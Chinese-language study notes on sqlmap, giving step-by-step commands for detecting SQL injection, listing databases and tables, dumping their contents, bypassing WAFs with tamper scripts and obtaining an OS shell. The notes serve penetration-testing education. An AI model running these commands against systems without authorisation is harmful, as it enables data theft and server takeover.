sqlmap工具的使用
sql注入工具,明小子,啊D,萝卜头,穿山甲,sqlmap等
开源自动化注入利用工具,支持的数据库有12种,在/plugins中可以看到支持的数据库种类,在所有注入利用工具中是最好用的
支持的注入类型,bool,时间,报错,联合,堆查询,内联,可以获取用户名,密码,权限,角色,数据库(表,字段,内容),可以爆破识别密文数据,getshel,命令执行,拖库/删库
sqlmap文件夹
doc,介绍文档
extra,是sqlmap额外的功能,运行cms执行命令
lib,sqlmap核心功能代码
pluigins包含12种数据库识别程序
data存放攻击过程中的使用的工具或命令脚本,data文件加下,procs包含的mssql,mysql,orcale,postgresql的触发方式,shell是远程命令和后门,txt是表名列名字典,udf妨攻击载荷pyload,xml是检测的pyload
tarmper,包含各种绕waf的处理脚本
thirdparty,第三方处理程序插件,颜色,优化,等
sqlmap工作流程
1,初始化
2,开始检测,检测之前是否对某个url注入过,会把检测的url默认存放在用户家目录中.sqlmap下的output,使用--output-dir参数可以指定存放的目录-->解析url,判断该url是否可以访问-->检测是否有waf,sqlmap -u "url" --identify-waf, sqlmap -u "url" --checkwaf -->执行用户输入的参数,-u指定url,-p执行参数,-v指定显示的级别,--dbs所有数据库,--current-db当前数据库,--tables表名,--columns列名,--dump获取数据,--batch跳过问询,--DBMS指定数据库类型等
步骤详解
1,判断注入点,sqlmap -u "目标url",当看到结果中有环境参数,表名有注入,系统类型,数据库类型,后台版本等
2,查看所有的数据库,sqlmap -u "url" --dbs --dbms mysql
3,获取当前数据库,sqlmap -u "url" --current-db --dbms mysql
4,获取数据库下的表,sqlmap -u "url" -D 库名 --dbms mysql --batch --tables
5,获取数据库下指定表的字段名,sqlmap -u "url" -D 库名 -T 表名 --columns
6,获取指定字段的内容,sqlmap -u "url" -D库名 -T表名 -C 字段名 --dump,字段名可以多个,需要,逗号隔开
POST型注入的sqlmap利用方法
1,拦截数据包,保存到txt文件
2,python sqlmap -r 文件路径 -p "测试参数" ,-r读取指定的文件,-p指定注入的参数
cookie注入
--level=1-5级别,执行测试的登录,默认的是1,--level的参数设定为2或者2以上的时候,sqlmap会尝试注入Cookie参数。当--level参数设定为3或者3以上的时候,会尝试对User-Angent进行注入。
xff注入,X-Forwarded-For
sqlmap -u "url" -p "X-Forwarded-For" --level 3
sqlmap -r 文件路径 --level 3
UA,user-agnet注入同上
伪静态注入
sqlmap -u "url",要测试伪静态,在要测试的参数后边加*,之后测试就行
-v 0-6
如你想观察sqlmap对一个点是进行了怎样的尝试判断以及读取数据的,可以使用-v参数。
共有七个等级,默认为1:
0、只显示python错误以及严重的信息。
1、同时显示基本信息和警告信息。(默认)
2、同时显示debug信息。
3、同时显示注入的payload。
4、同时显示HTTP请求。
5、同时显示HTTP响应头。
6、同时显示HTTP响应页面。
风险等级--risk
共有四个风险等级,默认是1会测试大部分的测试语句,2会增加基于事件的测试语句,3会增加OR语句的SQL注入测试。
参数
列数据库管理用户--users,当前用户有权限读取包含所有用户的表的权限时,就可以列出所有管理用户。
-b,--banne,大多数的数据库系统都有一个函数可以返回数据库的版本号,通常这个函数是version()或者变量@@version这主要取决与是什么数据库。
-current-user,在大多数据库中可以获取到管理数据的用户。
--current-db,返还当前连接的数据库。
--tamper,修改注入的数据,sqlmap除了使用CHAR()函数来防止出现单引号之外没有对注入的数据修改,你可以使用--tamper参数对数据做修改来绕过WAF等设备。
--roles,数据库用户角色
--password 数据库密码
--hostname,系统名称
sqlmap注入点执行系统命令或者交互式shell
条件1,数据库有写文件权限,条件2,需要知道web站点的路径
sqlmap.py -u "url" --os-cms=ipconfig
--os-shell,获取系统的shell
--is-dba,判断当前用户是否是dba,是否为管理员
延时注入,--delay 2 延时注入
--sql-query,--sql-shell
sqlmap会自动检测确定使用哪种SQL注入技术,如何插入检索语句。
如果是SELECT查询语句,sqlap将会输出结果。如果是通过SQL注入执行其他语句,需要测试是否支持多语句执行SQL语句。
sqlmap直连mysql数据库
sqlmap -d "mysql://root:root@localhost:3306/mysql" -f --banner --dbs --users
sqlmap注入利用access
access数据库,没有库的概念,打开的数据库文件看到的只有表和字段以及内容
sqlmap -u "url" --tables
sqlmap -u "url" --T 表名 --columns
sqlmap -u "url" -T表名 -C 字段名 --dump